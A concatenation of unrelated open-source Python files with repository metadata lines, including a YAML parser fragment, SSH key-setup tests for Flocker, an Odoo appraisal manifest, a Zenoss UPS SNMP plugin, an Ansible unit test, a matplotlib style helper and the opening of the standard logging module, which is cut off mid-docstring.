parse_flow_sequence_entry_mapping_key(self): token = self.get_token() if not self.check_token(ValueToken, FlowEntryToken, FlowSequenceEndToken): self.states.append(self.parse_flow_sequence_entry_mapping_value) return self.parse_flow_node() else: self.state = self.parse_flow_sequence_entry_mapping_value return self.process_empty_scalar(token.end_mark) def parse_flow_sequence_entry_mapping_value(self): if self.check_token(ValueToken): token = self.get_token() if not self.check_token(FlowEntryToken, FlowSequenceEndToken): self.states.append(self.parse_flow_sequence_entry_mapping_end) return self.parse_flow_node() else: self.state = self.parse_flow_sequence_entry_mapping_end return self.process_empty_scalar(token.end_mark) else: self.state = self.parse_flow_sequence_entry_mapping_end token = self.peek_token() return self.process_empty_scalar(token.start_mark) def parse_flow_sequence_entry_mapping_end(self): self.state = self.parse_flow_sequence_entry token = self.peek_token() return MappingEndEvent(token.start_mark, token.start_mark) # flow_mapping ::= FLOW-MAPPING-START # (flow_mapping_entry FLOW-ENTRY)* # flow_mapping_entry? # FLOW-MAPPING-END # flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)? def parse_flow_mapping_first_key(self): token = self.get_token() self.marks.append(token.start_mark) return self.parse_flow_mapping_key(first=True) def parse_flow_mapping_key(self, first=False): if not self.check_token(FlowMappingEndToken): if not first: if self.check_token(FlowEntryToken): self.get_token() else: token = self.peek_token() raise ParserError("while parsing a flow mapping", self.marks[-1], "expected ',' or '}', but got %r" % token.id, token.start_mark) if self.check_token(KeyToken): token = self.get_token() if not self.check_token(ValueToken, FlowEntryToken, FlowMappingEndToken): self.states.append(self.parse_flow_mapping_value) return self.parse_flow_node() else: self.state = self.parse_flow_mapping_value return self.process_empty_scalar(token.end_mark) elif not self.check_token(FlowMappingEndToken): self.states.append(self.parse_flow_mapping_empty_value) return self.parse_flow_node() token = self.get_token() event = MappingEndEvent(token.start_mark, token.end_mark) self.state = self.states.pop() self.marks.pop() return event def parse_flow_mapping_value(self): if self.check_token(ValueToken): token = self.get_token() if not self.check_token(FlowEntryToken, FlowMappingEndToken): self.states.append(self.parse_flow_mapping_key) return self.parse_flow_node() else: self.state = self.parse_flow_mapping_key return self.process_empty_scalar(token.end_mark) else: self.state = self.parse_flow_mapping_key token = self.peek_token() return self.process_empty_scalar(token.start_mark) def parse_flow_mapping_empty_value(self): self.state = self.parse_flow_mapping_key return self.process_empty_scalar(self.peek_token().start_mark) def process_empty_scalar(self, mark): return ScalarEvent(None, None, (True, False), u'', mark, mark)
mit
Azulinho/flocker
flocker/cli/functional/test_sshconfig.py
15
9942
# Copyright Hybrid Logic Ltd. See LICENSE file for details. """ Tests for ``flocker.cli._sshconfig``. """ from os.path import expanduser from socket import socket from subprocess import CalledProcessError from twisted.trial.unittest import TestCase from twisted.python.filepath import FilePath, Permissions from twisted.internet.threads import deferToThread from .. import configure_ssh from .._sshconfig import OpenSSHConfiguration from ...testtools.ssh import create_ssh_server, create_ssh_agent, if_conch try: from twisted.conch.ssh.keys import Key except ImportError: pass def goodlines(path): """ Return a list of lines read from ``path`` excluding those that are blank or begin with ``#``. :param FilePath path: The path to the file to read. :return: A ``list`` of ``bytes`` giving good lines from the file. """ return list(line for line in path.getContent().splitlines() if line and not line.strip().startswith(b"#")) class ConfigureSSHTests(TestCase): """ Tests for ``configure_ssh``. """ def setUp(self): self.ssh_config = FilePath(self.mktemp()) self.server = create_ssh_server(self.ssh_config) # Create a fake local keypair self.addCleanup(self.server.restore) self.flocker_config = FilePath(self.mktemp()) self.config = OpenSSHConfiguration( ssh_config_path=self.ssh_config, flocker_path=self.flocker_config) self.config.create_keypair() self.configure_ssh = self.config.configure_ssh self.agent = create_ssh_agent(self.server.key_path, testcase=self) def test_connection_failed(self): """ If an SSH connection cannot be established to the given address then an exception is raised explaining that this is so. """ # Bind a port and guarantee it is not accepting connections. blocker = socket() blocker.bind((b"127.0.0.1", 0)) port = blocker.getsockname()[1] exc = self.assertRaises(CalledProcessError, self.configure_ssh, b"127.0.0.1", port) # There are different error messages on different platforms. # On Linux the error may be: # 'ssh: connect to host 127.0.0.1 port 34716: Connection refused\r\n' # On OS X the error may be: # 'ssh: connect to host 127.0.0.1 port 56711: Operation timed out\r\n' self.assertTrue(b"refused" in exc.output or "Operation timed out" in exc.output) def test_authorized_keys(self): """ When the SSH connection is established, the ``~/.ssh/authorized_keys`` file has the public part of the generated key pair appended to it. """ configuring = deferToThread( self.configure_ssh, self.server.ip, self.server.port) def configured(ignored): id_rsa_pub = self.ssh_config.child(b"id_rsa_flocker.pub") keys = self.server.home.descendant([b".ssh", b"authorized_keys"]) # Compare the contents ignoring comments for ease. self.assertEqual(goodlines(id_rsa_pub), goodlines(keys)) configuring.addCallback(configured) return configuring def test_authorized_keys_already_in_place(self): """ When the SSH connection is established, if the ``~/.ssh/authorized_keys`` file already has the public part of the key pair then it is not appended again. """ configuring = deferToThread( self.configure_ssh, self.server.ip, self.server.port) configuring.addCallback( lambda ignored: deferToThread( self.configure_ssh, self.server.ip, self.server.port)) def configured(ignored): id_rsa_pub = self.ssh_config.child(b"id_rsa_flocker.pub") keys = self.server.home.descendant([b".ssh", b"authorized_keys"]) self.assertEqual(goodlines(id_rsa_pub), goodlines(keys)) configuring.addCallback(configured) return configuring def test_existing_authorized_keys_preserved(self): """ Any unrelated content in the ``~/.ssh/authorized_keys`` file is left in place by ``configure_ssh``. """ existing_keys = ( b"ssh-dss AAAAB3Nz1234567890 comment\n" b"ssh-dss AAAAB3Nz0987654321 comment\n" ) ssh_path = self.server.home.child(b".ssh") ssh_path.makedirs() authorized_keys = ssh_path.child(b"authorized_keys") authorized_keys.setContent(existing_keys) configuring = deferToThread( self.configure_ssh, self.server.ip, self.server.port) def configured(ignored): self.assertIn(existing_keys, authorized_keys.getContent()) configuring.addCallback(configured) return configuring def test_flocker_keypair_written(self): """ ``configure_ssh`` writes the keypair to ``id_rsa_flocker`` and ``id_rsa_flocker.pub`` remotely. """ configuring = deferToThread( self.configure_ssh, self.server.ip, self.server.port) def configured(ignored): expected = ( self.ssh_config.child(b"id_rsa_flocker").getContent(), self.ssh_config.child(b"id_rsa_flocker.pub").getContent() ) actual = ( self.flocker_config.child(b"id_rsa_flocker").getContent(), self.flocker_config.child(b"id_rsa_flocker.pub").getContent() ) self.assertEqual(expected, actual) configuring.addCallback(configured) return configuring def test_flocker_keypair_permissions(self): """ ``configure_ssh`` writes the remote keypair with secure permissions. """ configuring = deferToThread( self.configure_ssh, self.server.ip, self.server.port) expected_private_key_permissions = Permissions(0600) expected_public_key_permissions = Permissions(0644) def configured(ignored): expected = ( expected_private_key_permissions, expected_public_key_permissions ) actual = ( self.flocker_config.child(b"id_rsa_flocker").getPermissions(), self.flocker_config.child( b"id_rsa_flocker.pub").getPermissions() ) self.assertEqual(expected, actual) configuring.addCallback(configured) return configuring class CreateKeyPairTests(TestCase): """ Tests for ``create_keypair``. """ @if_conch def test_key_generated(self): """ ``create_keypair`` generates a new key pair and writes it locally to ``id_rsa_flocker`` and ``id_rsa_flocker.pub``. """ ssh_config = FilePath(self.mktemp()) configurator = OpenSSHConfiguration( ssh_config_path=ssh_config, flocker_path=None) configurator.create_keypair() id_rsa = ssh_config.child(b"id_rsa_flocker") id_rsa_pub = ssh_config.child(b"id_rsa_flocker.pub") key = Key.fromFile(id_rsa.path) self.assertEqual( # Avoid comparing the comment key.public().toString( type="OPENSSH", extra='test comment').split(None, 2)[:2], id_rsa_pub.getContent().split(None, 2)[:2]) @if_conch def test_key_not_regenerated(self): """ ``create_keypair`` does not generate a new key pair if one can already be found in ``id_rsa_flocker`` and ``id_rsa_flocker.pub``. """ ssh_config = FilePath(self.mktemp()) configurator = OpenSSHConfiguration( ssh_config_path=ssh_config, flocker_path=None) id_rsa = ssh_config.child(b"id_rsa_flocker") configurator.create_keypair() expected_key = Key.fromFile(id_rsa.path) configurator.create_keypair() self.assertEqual(expected_key, Key.fromFile(id_rsa.path)) def test_key_permissions(self): """ ``create_keypair`` sets secure permissions on ``id_rsa_flocker`` and ``id_rsa_flocker.pub``. """ ssh_config = FilePath(self.mktemp()) configurator = OpenSSHConfiguration( ssh_config_path=ssh_config, flocker_path=None) configurator.create_keypair() expected_private_key_permissions = Permissions(0600) expected_public_key_permissions = Permissions(0644) id_rsa = ssh_config.child(b"id_rsa_flocker") id_rsa_pub = ssh_config.child(b"id_rsa_flocker.pub") self.assertEqual( (expected_private_key_permissions, expected_public_key_permissions), (id_rsa.getPermissions(), id_rsa_pub.getPermissions())) class OpenSSHDefaultsTests(TestCase): """ Tests for `OpenSSHConfiguration.defaults``. """ def test_flocker_path(self): """ ``OpenSSHConfiguration.defaults`` creates an instance with ``/etc/flocker`` as the Flocker configuration path. """ self.assertEqual( FilePath(b"/etc/flocker"), OpenSSHConfiguration.defaults().flocker_path) def test_ssh_config_path(self): """ ``OpenSSHConfiguration.defaults`` creates an instance with the current user's SSH configuration path as the SSH configuration path. """ expected = FilePath(expanduser(b"~")).child(b".ssh") self.assertEqual( expected, OpenSSHConfiguration.defaults().ssh_config_path) def test_configure_ssh(self): """ ``configure_ssh`` is taken from an ``OpenSSHConfiguration`` instance created using the ``defaults`` method. """ self.assertEqual( OpenSSHConfiguration.defaults().configure_ssh, configure_ssh)
apache-2.0
vrenaville/OCB
addons/hr_evaluation/__openerp__.py
53
3305
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Employee Appraisals', 'version': '0.1', 'author': 'OpenERP SA', 'category': 'Human Resources', 'sequence': 31, 'website': 'https://www.odoo.com/page/appraisal', 'summary': 'Periodical Evaluations, Appraisals, Surveys', 'images': ['images/hr_evaluation_analysis.jpeg', 'images/hr_evaluation.jpeg', 'images/hr_interview_requests.jpeg'], 'depends': ['hr', 'calendar', 'survey'], 'description': """ Periodical Employees evaluation and appraisals ============================================== By using this application you can maintain the motivational process by doing periodical evaluations of your employees' performance. The regular assessment of human resources can benefit your people as well your organization. An evaluation plan can be assigned to each employee. These plans define the frequency and the way you manage your periodic personal evaluations. You will be able to define steps and attach interview forms to each step. Manages several types of evaluations: bottom-up, top-down, self-evaluations and the final evaluation by the manager. Key Features ------------ * Ability to create employees evaluations. * An evaluation can be created by an employee for subordinates, juniors as well as his manager. * The evaluation is done according to a plan in which various surveys can be created. Each survey can be answered by a particular level in the employees hierarchy. The final review and evaluation is done by the manager. * Every evaluation filled by employees can be viewed in a PDF form. * Interview Requests are generated automatically by OpenERP according to employees evaluation plans. Each user receives automatic emails and requests to perform a periodical evaluation of their colleagues. """, "data": [ 'security/ir.model.access.csv', 'security/hr_evaluation_security.xml', 'hr_evaluation_view.xml', 'report/hr_evaluation_report_view.xml', 'survey_data_appraisal.xml', 'hr_evaluation_data.xml', 'hr_evaluation_installer.xml', ], "demo": ["hr_evaluation_demo.xml"], # 'test': [ # 'test/test_hr_evaluation.yml', # 'test/hr_evalution_demo.yml', # ], 'auto_install': False, 'installable': True, 'application': True, }
agpl-3.0
anksp21/Community-Zenpacks
ZenPacks.ZenSystems.ApcUps/ZenPacks/ZenSystems/ApcUps/modeler/plugins/ApcUpsDeviceMap.py
2
2850
########################################################################## # Author: Jane Curry, [email protected] # Date: March 28th, 2011 # Revised: # # ApcUpsDevice modler plugin # # This program can be used under the GNU General Public License version 2 # You can find full information here: http://www.zenoss.com/oss # ########################################################################## __doc__ = """ApcUpsDeviceMap Gather information from APC UPS devices. """ from Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetMap from Products.DataCollector.plugins.DataMaps import MultiArgs import re class ApcUpsDeviceMap(SnmpPlugin): maptype = "ApcUpsDeviceMap" snmpGetMap = GetMap({ '.1.3.6.1.4.1.318.1.1.1.1.1.1.0': 'setHWProductKey', '.1.3.6.1.4.1.318.1.1.1.1.2.1.0': 'setOSProductKey', '.1.3.6.1.4.1.318.1.1.1.1.2.3.0': 'setHWSerialNumber', '.1.3.6.1.4.1.318.1.1.1.2.2.5.0': 'numBatteryPacks', '.1.3.6.1.4.1.318.1.1.1.2.2.6.0': 'numBadBatteryPacks', '.1.3.6.1.4.1.318.1.1.1.4.1.1.0': 'basicOutputStatus', }) def condition(self, device, log): """only for boxes with proper object id """ return device.snmpOid.startswith(".1.3.6.1.4.1.318.1.3.2") def process(self, device, results, log): """collect snmp information from this device""" log.info('processing %s for device %s', self.name(), device.id) getdata, tabledata = results om = self.objectMap(getdata) manufacturer = "American Power Conversion Corp." om.setHWProductKey = MultiArgs(om.setHWProductKey, manufacturer) # log.debug("HWProductKey=%s Manufacturer = %s" % (om.setHWProductKey, manufacturer)) om.setOSProductKey = MultiArgs(om.setOSProductKey, manufacturer) # log.debug("OSProductKey=%s Manufacturer = %s" % (om.setOSProductKey, manufacturer)) if (om.basicOutputStatus < 1 or om.basicOutputStatus > 12): om.basicOutputStatus = 1 index = om.basicOutputStatus om.basicOutputStatusText = self.basicOutputStatusMap[index] return om basicOutputStatusMap = { 1: 'Unknown', 2: 'onLine', 3: 'onBattery', 4: 'onSmartBoost', 5: 'timedSleeping', 6: 'softwareBypass', 7: 'off', 8: 'rebooting', 9: 'switchedBypass', 10: 'hardwareFailureBypass', 11: 'sleepingUntilPowerReturn', 12: 'onSmartTrim', }
gpl-2.0
shepdelacreme/ansible
test/units/parsing/utils/test_jsonify.py
113
1491
# -*- coding: utf-8 -*- # (c) 2016, James Cammarata <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. from __future__ import (absolute_import, division, print_function) __metaclass__ = type from units.compat import unittest from ansible.parsing.utils.jsonify import jsonify class TestJsonify(unittest.TestCase): def test_jsonify_simple(self): self.assertEqual(jsonify(dict(a=1, b=2, c=3)), '{"a": 1, "b": 2, "c": 3}') def test_jsonify_simple_format(self): res = jsonify(dict(a=1, b=2, c=3), format=True) cleaned = "".join([x.strip() for x in res.splitlines()]) self.assertEqual(cleaned, '{"a": 1,"b": 2,"c": 3}') def test_jsonify_unicode(self): self.assertEqual(jsonify(dict(toshio=u'くらとみ')), u'{"toshio": "くらとみ"}') def test_jsonify_empty(self): self.assertEqual(jsonify(None), '{}')
gpl-3.0
sharthee/ProgrammingAssignment2
labs/lab2/cs109style.py
38
1293
from __future__ import print_function from IPython.core.display import HTML from matplotlib import rcParams #colorbrewer2 Dark2 qualitative color table dark2_colors = [(0.10588235294117647, 0.6196078431372549, 0.4666666666666667), (0.8509803921568627, 0.37254901960784315, 0.00784313725490196), (0.4588235294117647, 0.4392156862745098, 0.7019607843137254), (0.9058823529411765, 0.1607843137254902, 0.5411764705882353), (0.4, 0.6509803921568628, 0.11764705882352941), (0.9019607843137255, 0.6705882352941176, 0.00784313725490196), (0.6509803921568628, 0.4627450980392157, 0.11372549019607843), (0.4, 0.4, 0.4)] def customize_mpl(): """Tweak matplotlib visual style""" print("Setting custom matplotlib visual style") rcParams['figure.figsize'] = (10, 6) rcParams['figure.dpi'] = 150 rcParams['axes.color_cycle'] = dark2_colors rcParams['lines.linewidth'] = 2 rcParams['axes.grid'] = True rcParams['axes.facecolor'] = '#eeeeee' rcParams['font.size'] = 14 rcParams['patch.edgecolor'] = 'none' def customize_css(): print("Setting custom CSS for the IPython Notebook") styles = open('custom.css', 'r').read() return HTML(styles)
mit
40223240/cadb_g3_0420
static/Brython3.1.1-20150328-091302/Lib/logging/__init__.py
733
66279
# Copyright 2001-2013 by Vinay Sajip. All Rights Reserved. # # Permission to use, copy, modify, and distribute this software and its # documentation for any purpose and without fee is hereby granted, # provided that the above copyright notice appear in all copies and that # both that copyright notice and this permission notice appear in # supporting documentation, and that the name of Vinay Sajip # not be used in advertising or publicity pertaining to distribution # of the software without specific, written prior permission. # VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING # ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL # VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR # ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER # IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT # OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. """ Logging package for Python. Based on PEP 282 and comments thereto in comp.lang.python. Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved. To use, simply 'import logging' and log away! """ import sys, os, time, io, traceback, warnings, weakref from string import Template __all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR', 'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO', 'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler', 'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig', 'captureWarnings', 'critical', 'debug', 'disable', 'error', 'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass', 'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning', 'getLogRecordFactory', 'setLogRecordFactory', 'lastResort'] try: import threading except ImportError: #pragma: no cover threading = None __author__ = "Vinay Sajip <[email protected]>" __status__ = "production" __version__ = "0.5.1.2" __date__ = "07 February 2010" #--------------------------------------------------------------------------- # Miscellaneous module data #--------------------------------------------------------------------------- # # _srcfile is used when walking the stack to check when we've got the first # caller stack frame. # if hasattr(sys, 'frozen'): #support for py2exe _srcfile = "logging%s__init__%s" % (os.sep, __file__[-4:]) else: _srcfile = __file__ _srcfile = os.path.normcase(_srcfile) if hasattr(sys, '_getframe'): currentframe = lambda: sys._getframe(3) else: #pragma: no cover def currentframe(): """Return the frame object for the caller's stack frame.""" try: raise Exception except: return sys.exc_info()[2].tb_frame.f_back # _srcfile is only used in conjunction with sys._getframe(). # To provide compatibility with older versions of Python, set _srcfile # to None if _getframe() is not available; this value will prevent # findCaller() from being called. #if not hasattr(sys, "_getframe"): # _srcfile = None # #_startTime is used as the base when calculating the relative time of events # _startTime = time.time() # #raiseExceptions is used to see if exceptions during handling should be #propagated # raiseExceptions = True # # If you don't want threading information in the log, set this to zero # logThreads = True # # If you don't want multiprocessing information in the log, set this to zero # logMultiprocessing = True # # If you don't want process information in the log, set this to zero # logProcesses = True #--------------------------------------------------------------------------- # Level related stuff #--------------------------------------------------------------------------- # # Default levels and level names, these can be replaced with any positive set # of values having corresponding names. There is a pseudo-level, NOTSET, which # is only really there as a lower limit for user-defined levels. Handlers and # loggers are initialized with NOTSET so that they will log all messages, even # at user-defined levels. # CRITICAL = 50 FATAL = CRITICAL ERROR = 40 WARNING = 30 WARN = WARNING INFO = 20 DEBUG = 10 NOTSET = 0 _levelNames = { CRITICAL : 'CRITICAL', ERROR : 'ERROR', WARNING : 'WARNING', INFO : 'INFO', DEBUG : 'DEBUG', NOTSET : 'NOTSET', 'CRITICAL' : CRITICAL, 'ERROR' : ERROR, 'WARN' : WARNING, 'WARNING' : WARNING, 'INFO' : INFO, 'DEBUG' : DEBUG, 'NOTSET' : NOTSET, } def getLevelName(level): """ Return the textual representation of logging level 'level'. If the level is one of the predefined levels (CRITICAL, ERROR, WARNING, INFO, DEBUG) then you get the corresponding string. If you have associated levels with names using addLevelName then the name you have associated with 'level' is returned. If a numeric value corresponding to one of the defined levels is passed in, the corresponding string representation is returned. Otherwise, the string "Level %s" % level is returned. """ return _levelNames.get(level, ("Level %s" % level)) def addLevelName(level, levelName): """ Associate 'levelName' with 'level'. This is used when converting levels to text during message formatting. """ _acquireLock() try: #unlikely to cause an exception, but you never know... _levelNames[level] = levelName _levelNames[levelName] = level finally: _releaseLock() def _checkLevel(level): if isinstance(level, int): rv = level elif str(level) == level: if level not in _levelNames: raise ValueError("Unknown level: %r" % level) rv = _levelNames[level] else: raise TypeError("Level not an integer or a valid string: %r" % level) return rv #--------------------------------------------------------------------------- # Thread-related stuff #--------------------------------------------------------------------------- # #_lock is used to serialize access to shared data structures in this module. #This needs to be an RLock because fileConfig() creates and configures #Handlers, and so might arbitrary user threads. Since Handler code updates the #shared dictionary _handlers, it needs to acquire the lock. But if configuring, #the lock would already have been acquired - so we need an RLock. #The same argument applies to Loggers and Manager.loggerDict. # if threading: _lock = threading.RLock() else: #pragma: no cover _lock = None def _acquireLock(): """ Acquire the module-level lock for serializing access to shared data. This should be released with _releaseLock(). """ if _lock: _lock.acquire() def _releaseLock(): """ Release the module-level lock acquired by calling _acquireLock(). """ if _lock: _lock.release() #--------------------------------------------------------------------------- # The logging record #--------------------------------------------------------------------------- class LogRecord(object): """ A LogRecord instance represents an event being logged. LogRecord instances are created every time something is logged. They contain all the information pertinent to the event being logged. The main information passed in is in msg and args, which are combined using str(msg) % args to create the message field of the record. The record also includes information such as when the record was created, the source line where the logging call was made, and any exception information to be logged. """ def __init__(self, name, level, pathname, lineno, msg, args, exc_info, func=None, sinfo=None, **kwargs): """ Initialize a logging record with interesting information. """ ct = time.time() self.name = name self.msg = msg # # The following statement allows passing of a dictionary as a sole # argument, so that you can do something like # logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2}) # Suggested by Stefan Behnel. # Note that without the test for args[0], we get a problem because # during formatting, we test to see if the arg is present using # 'if self.args:'. If the event being logged is e.g. 'Value is %d' # and if the passed arg fails 'if self.args:' then no formatting # is done. For example, logger.warning('Value is %d', 0) would log # 'Value is %d' instead of 'Value is 0'. # For the use case of passing a dictionary, this should not be a # problem. if args and len(args) == 1 and isinstance(args[0], dict) and args[0]: args = args[0] self.args = args self.levelname = getLevelName(level) self.levelno = level self.pathname = pathname try: self.filename = os.path.basename(pathname) self.module = os.path.splitext(self.filename)[0] except (TypeError, ValueError, AttributeError): self.filename = pathname self.module = "Unknown module" self.exc_info = exc_info self.exc_text = None # used to cache the traceback text self.stack_info = sinfo self.lineno = lineno self.funcName = func self.created = ct self.msecs = (ct - int(ct)) * 1000 self.relativeCreated = (self.created - _startTime) * 1000 if logThreads and threading: self.thread = threading.get_ident() self.threadName = threading.current_thread().name else: # pragma: no cover self.thread = None self.threadName = None if not logMultiprocessing: # pragma: no cover self.processName = None else: self.processName = 'MainProcess' mp = sys.modules.get('multiprocessing') if mp is not None: # Errors may occur if multiprocessing has not finished loading # yet - e.g. if a custom import hook causes third-party code # to run when multiprocessing calls import. See issue 8200 # for an example try: self.processName = mp.current_process().name except Exception: #pragma: no cover pass if logProcesses and hasattr(os, 'getpid'): self.process = os.getpid() else: self.process = None def __str__(self): return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno, self.pathname, self.lineno, self.msg) def getMessage(self): """ Return the message for this LogRecord. Return the message for this LogRecord after merging any user-supplied arguments with the message. """ msg = str(self.msg) if self.args: msg = msg % self.args return msg # # Determine which class to use when instantiating log records. # _logRecordFactory = LogRecord def setLogRecordFactory(factory): """ Set the factory to be used when instantiating a log record. :param factory: A callable which will be called to instantiate a log record. """ global _logRecordFactory _logRecordFactory = factory def getLogRecordFactory(): """ Return the factory to be used when instantiating a log record. """ return _logRecordFactory def makeLogRecord(dict): """ Make a LogRecord whose attributes are defined by the specified dictionary, This function is useful for converting a logging event received over a socket connection (which is sent as a dictionary) into a LogRecord instance. """ rv = _logRecordFactory(None, None, "", 0, "", (), None, None) rv.__dict__.update(dict) return rv #--------------------------------------------------------------------------- # Formatter classes and functions #--------------------------------------------------------------------------- class PercentStyle(object): default_format = '%(message)s' asctime_format = '%(asctime)s' asctime_search = '%(asctime)' def __init__(self, fmt): self._fmt = fmt or self.default_format def usesTime(self): return self._fmt.find(self.asctime_search) >= 0 def format(self, record): return self._fmt % record.__dict__ class StrFormatStyle(PercentStyle): default_format = '{message}' asctime_format = '{asctime}' asctime_search = '{asctime' def format(self, record): return self._fmt.format(**record.__dict__) class StringTemplateStyle(PercentStyle): default_format = '${message}' asctime_format = '${asctime}' asctime_search = '${asctime}' def __init__(self, fmt): self._fmt = fmt or self.default_format self._tpl = Template(self._fmt) def usesTime(self): fmt = self._fmt return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0 def format(self, record): return self._tpl.substitute(**record.__dict__) _STYLES = { '%': PercentStyle, '{': StrFormatStyle, '$': StringTemplateStyle } class Formatter(object): """ Formatter instances are used to convert a LogRecord to text. Formatters need to know how a LogRecord is constructed. They are responsible for converting a LogRecord to (usually) a string which can be interpreted by either a human or an external system. The base Formatter allows a formatting string to be specified. If none is supplied, the default value of "%s(message)" is used. The Formatter can be initialized with a format string which makes use of knowledge of the LogRecord attributes - e.g. the default value mentioned above makes use of the fact that the user's message and arguments are pre- formatted into a LogRecord's message attribute. Currently, the useful attributes in a LogRecord are described by: %(name)s Name of the logger (logging channel) %(levelno)s Numeric logging level for the message (DEBUG, INFO, WARNING, ERROR, CRITICAL) %(levelname)s Text logging level for the message ("DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL") %(pathname)s Full pathname of the source file where the logging call was issued (if available) %(filename)s Filename portion of pathname %(module)s Module (name portion of filename) %(lineno)d Source line number where the logging call was issued (if available) %(funcName)s Function name %(created)f Time when the LogRecord was created (time.time() return value) %(asctime)s Textual time when the LogRecord was created %(msecs)d Millisecond portion of the creation time %(relativeCreated)d Time in milliseconds when the LogRecord was created, relative to the time the logging module was loaded (typically at application startup time) %(thread)d Thread ID (if available) %(threadName)s Thread name (if available) %(process)d Process ID (if available) %(message)s The result of record.getMessage(), computed just as the record is emitted """ converter = time.localtime def __init__(self, fmt=None, datefmt=None, style='%'): """ Initialize the formatter with specified format strings. Initialize the formatter either with the specified format string, or a default as described above. Allow for specialized date formatting with the optional datefmt argument (if omitted, you get the ISO8601 format). Use a style parameter of '%', '{' or '$' to specify that you want to use one of %-formatting, :meth:`str.format` (``{}``) formatting or :class:`string.Template` formatting in your format string. .. versionchanged: 3.2 Added the ``style`` parameter. """ if style not in _STYLES: raise ValueError('Style must be one of: %s' % ','.join( _STYLES.keys())) self._style = _STYLES[style](fmt) self._fmt = self._style._fmt self.datefmt = datefmt default_time_format = '%Y-%m-%d %H:%M:%S' default_msec_format = '%s,%03d' def formatTime(self, record, datefmt=None): """ Return the creation time of the specified LogRecord as formatted text. This method should be called from format() by a formatter which wants to make use of a formatted time. This method can be overridden in formatters to provide for any specific requirement, but the basic behaviour is as follows: if datefmt (a string) is specified, it is used with time.strftime() to format the creation time of the record. Otherwise, the ISO8601 format is used. The resulting string is returned. This function uses a user-configurable function to convert the creation time to a tuple. By default, time.localtime() is used; to change this for a particular formatter instance, set the 'converter' attribute to a function with the same signature as time.localtime() or time.gmtime(). To change it for all formatters, for example if you want all logging times to be shown in GMT, set the 'converter' attribute in the Formatter class. """ ct = self.converter(record.created) if datefmt: s = time.strftime(datefmt, ct) else: t = time.strftime(self.default_time_format, ct) s = self.default_msec_format % (t, record.msecs) return s def formatException(self, ei): """ Format and return the specified exception information as a string. This default implementation just uses traceback.print_exception() """ sio = io.StringIO() tb = ei[2] # See issues #9427, #1553375. Commented out for now. #if getattr(self, 'fullstack', False): # traceback.print_stack(tb.tb_frame.f_back, file=sio) traceback.print_exception(ei[0], ei[1], tb, None, sio) s = sio.getvalue() sio.close() if s[-1:] == "\n": s = s[:-1] return s def usesTime(self): """ Check if the format uses the creation time of the record. """ return self._style.usesTime() def formatMessage(self, record): return self._style.format(record) def formatStack(self, stack_info): """ This method is provided as an extension point for specialized formatting of stack information. The input data is a string as returned from a call to :func:`traceback.print_stack`, but with the last trailing newline removed. The base implementation just returns the value passed in. """ return stack_info def format(self, record): """ Format the specified record as text. The record's attribute dictionary is used as the operand to a string formatting operation which yields the returned string. Before formatting the dictionary, a couple of preparatory steps are carried out. The message attribute of the record is computed using LogRecord.getMessage(). If the formatting string uses the time (as determined by a call to usesTime(), formatTime() is called to format the event time. If there is exception information, it is formatted using formatException() and appended to the message. """ record.message = record.getMessage() if self.usesTime(): record.asctime = self.formatTime(record, self.datefmt) s = self.formatMessage(record) if record.exc_info: # Cache the traceback text to avoid converting it multiple times # (it's constant anyway) if not record.exc_text: record.exc_text = self.formatException(record.exc_info) if record.exc_text: if s[-1:] != "\n": s = s + "\n" s = s + record.exc_text if record.stack_info: if s[-1:] != "\n": s = s + "\n" s = s + self.formatStack(record.stack_info) return s # # The default formatter to use when no other is specified # _defaultFormatter = Formatter() class BufferingFormatter(object): """ A formatter suitable for formatting a number of records. """ def __init__(self, linefmt=None): """ Optionally specify a formatter which will be used to format each individual record. """ if linefmt: self.linefmt = linefmt else: self.linefmt = _defaultFormatter def formatHeader(self, records): """ Return the header string for the specified records. """ return "" def formatFooter(self, records): """ Return the footer string for the specified records. """ return "" def format(self, records): """ Format the specified records and return the result as a string. """ rv = "" if len(records) > 0: rv = rv + self.formatHeader(records) for record in records: rv = rv + self.linefmt.format(record) rv = rv + self.formatFooter(records) return rv #--------------------------------------------------------------------------- # Filter classes and functions #--------------------------------------------------------------------------- class Filter(object): """ Filter instances are used to 